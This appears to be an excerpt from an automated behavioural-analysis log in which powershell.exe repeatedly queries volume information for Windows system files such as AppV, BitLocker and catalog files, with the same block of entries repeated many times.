Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
